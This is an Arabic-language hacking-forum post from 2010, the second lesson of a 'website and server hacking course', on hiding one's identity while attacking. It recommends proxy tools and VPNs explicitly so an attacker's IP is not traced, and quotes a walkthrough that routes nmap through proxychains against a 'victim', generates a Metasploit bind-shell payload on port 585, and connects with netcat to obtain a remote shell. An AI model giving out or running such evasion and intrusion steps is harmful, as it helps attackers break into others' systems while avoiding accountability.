<~!~SyRiA - HaC~!~>
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

[ الدرس الثانى ] (التخفى)

اذهب الى الأسفل

 [ الدرس الثانى ] (التخفى)  Empty [ الدرس الثانى ] (التخفى)

مُساهمة  MRAAAD الجمعة أكتوبر 08, 2010 12:24 pm

بسم الله الرحمن الرحيم

اهلا بيكم فى ثانى درس من دروس دورة اختراق المواقع والسرفرات


فى الدرس السابق وضحنا ان من اهم الخطوات الواجب القيام بها عند الاختراق هيا جمع المعلومات لاكن فى الاول لازم نركز على قضيه مهمة وهى التخفى على الشبكة !

قبل القيام باى عملية لازم نكون متامنين على النت كويس او باعلى قدر من الامان وعلشان كدة ظهر ما يعرف باسم البروكسى "Proxy"

فى عميلة التخفى يتم استعمال ادوات وبرامج خاصة زى البروكسى مثلا للتخفى او الدخول باستخدام عنوان اخر .

درسنا النهاردة باذن الله هيكون درس خفيف جدا جدا > اوعى حد يتعود على كدة < عن التخفى وشرح لبعض ادوات البروكسى .

0-------------------0

بسم الله نبداء

فى الاول هتكلم عن اداة قوية فى عمليات التخفى وهيا اداة charlesproxy وان كان بعض الناس ممكن تختلف معى الا ان الاداة دى اثبتت فعلا قوتها وجدارتها بانها تصنف ضمن الادوات العليا فى التخفى

الاول موقع الاداة من هنا

الاداة قوية جدا وبتدعم خصائص كتيير جدا من النادر انك تلاقيهم فى اداة واحدة فهى بتدعم التخفى بالطرق الاتية

* Throttling
* Breakpoints
* SSL Proxying
* Reverse Proxy
* Port Forwarding

وكمان تحتوى على اداوت كتيير جدا مفيدة ممكن تستعملها اثناء عمليات الاختراق منها

* No Caching
* BlockC0okies
* Map Remote
* Map Local
* Rewrite
* Black List
* DNS Spoofing
* Mirror
* Auto Save
* Client Process
* Repeat
* Repeat Advanced
* Edit
* Validate

وممكن تحمل نسخة مجانية من الاداة من هنا


بعد التحميل فقط فك الضغط عن الاداة وشغلها وللعلم الاداة بتشتغل على واجهة ال GNU

عيب الاداة الوحيد انها اداة مدفوعة الثمن انما لها خواص كتيييرة

ندخل دلوقت على ثانى اداة عندنا النهاردة الى هيا اداة ال proxyknife او المعروفة باسم phc or proxy hunter customed

اداة قوية جدا من الاداوات الى بتنزل على اللينكس احيانا بيتيجى جاهزة مع بعض الصدارات وهيا من تقديم ال GNU PROJ عموما تقدروا تحملوا الاداة من هنا

عموما الاداة فعلا قديمة جدا لاكنها قوية جدا فى نفس الوقت عموما الاداة سهلة جدا جدا فى الاستخدام حملها بس انت وفك الضغط عنها وشغلها وانت تلاقى كل حاجة تمام معاك !

فاضل عندنا اخر حاجة الى هيا اداة ال

ProxyChains

سنتوقف قليلا ونشرح هذه الاداة

الكثير منا حاول يخترق مواقع لكن المشكله في IP المهاجم ,, ممكن ينصاد عن طريقه

على العموم اليوم راح نفحص بـ nmap ونستخدم ثغره عن طريق البروكسي

انتبه انتبه انتبه , عند اختيار البوركسي ,

لان ممكن يضيع عليك الثغرات, والثغرات اللي ممكن تشتغل مش مشتغله وكله بسبب البروكسي :-)

البروكسي المستخدم :
212.116.220.149:443

الاداه اللي راح نستخدمها هي proxychains

الاداه قويه واستخداماتها متنوعه ,, ببساطه هي عمل TCP tunneling عن طريق socks4/5 & http/s
فائدة الـ proxychains يجبر اي برنامج بأن يشتغل خلف بروكسي


لذلك انا راح استخدمها للاختراق والفحص :-)

الشرح فديو لكن بوضح بعض الاشياء ,



كود PHP:
nano /etc/proxychains.conf

انا وضعت البروكسي داخل الاعدادات




كود PHP:
proxychains nmap -PN -sT -sV -p 21,22,23,25,80 my-victim

انا اجبرت الـ nmap بأن يشتغل ورا بروكسي ويقوم فحص IP ضحيتي


ممكن تستخدم ادوات اخرى مثل nikto لكن ما يحتاج انك تستخدم proxychains لان

nikto له خاصيه العمل خلف بروكسي

بعد الفحص وجدنا ان بورت 21,80 مفتوحه , وراح نلاحظ ان الـ nmap اعطاني الـ بنر للبورت 21

وقدرت اطلع ثغره موجوده ,,


كود PHP:
msfpayload windows/shell_bind_tcp lport=585 C

علمت شل كود , وراح يعطيني شل على البورت 585



كود PHP:
proxychains nc -vn my-victim 585

الان حصلت شل عن طريق البروكسي

للتحميل

http://proxychains.sourceforge.net/

شرح الاداة لاخونا اخونا SiLv3r00t

والان نكمل الموضوع


لحد هنا نكون انجزنا فى موضوع البروكسى يعنى 3 اداوت لو تستعمل اداة منهم بغرض التخفى وانا شخصيا بفضل ال ProxyChains

0-------------------------0

زى ما قلنا التخفى طرقة كتيير دلوقت ندخل على طريقة تانى الى هيا ال VPN او ال Virtual Private Network

وهى طريقة جميلة جدا وفعالة للتخفى داخل شبكة وهمية والخدمة دى فى واقع كتيير جدا جدا بتقدمها اشهرها موقع http://openvpn.net

وممكن انت بنفسك تعمل VPN خاصة بيك لاكن دى بتحتاج شغل شوية

عموما احنا كل الى عاوزينة اننا نتخفى مش اكتر يبقى هنستعمل ارقام VPN خاصة ممكن نجمعها من على النت
طيب ازاى ممكن انك تستعمل رقم ال VPN ده عندك ؟
فيه طرق كتيير لاكن انا بفضل الطريقة الموجودة فى الموقع الرسمى

عموما دة الرابط الى علية الشرح من هنا
https://pr.ivacy.com/en/doc/user/setup/linux

لحد هنا انتهى درسنا النهاردة

سلامات
MRAAAD
MRAAAD
مدير
مدير

عدد المساهمات : 165
نقاط : 5471
السٌّمعَة : 0
تاريخ التسجيل : 28/09/2010
العمر : 32
الموقع : www.syriaa-hac.yoo7.com

http://www.syriaa-hac.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى